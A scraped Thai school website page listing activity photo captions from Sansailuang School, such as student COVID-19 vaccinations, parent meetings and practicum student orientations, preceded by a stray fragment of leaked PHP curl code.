$e=curl_exec($d); curl_close($d); return $e; } ?> ภาพกิจกรรม - Sansailuang School | https://ssl.ac.th

ภาพกิจกรรม

คณะครูนำนักเรียนฉีดวัคซีนรอบ 3

รับนักศึกษาสังเกตการสอนจากมหาวิทยาลัยเชียงใหม่

ปฐมนิเทศรับนักศึกษาฝึกประสบการณ์

กิจกรรมสัมพันธชุมชน

ประชุมผู้ปกครองนักเรียนชั้นอนุบาล

ประชุมเตรียมความพร้อมก่อนเปิดภาคเรียนที่ 2 ปีการศึกษา 2564

แสดงความยินดีกับครูที่ได้รับย้าย

นักเรียนรับการฉีดวัคซีไฟเซอร์ ณ โรงพยาบาลสันทราย

ตัวแทนครูมอบสิ่งของให้ครอบครัวนักเรียนที่ติดโควิด-19

ตัวแทนครูนำของเยี่ยมเพื่อเป็นขวัญ และกำลังใจให้กับครอบครัวนั..

ผู้อำนวยการโรงเรียนร่วมงานวันตำรวจแห่งชาติ สภ.สันทราย

ประชุมสรุปการใช้โปรแกรมระบบบริหารงานวิชาการโรงเรียน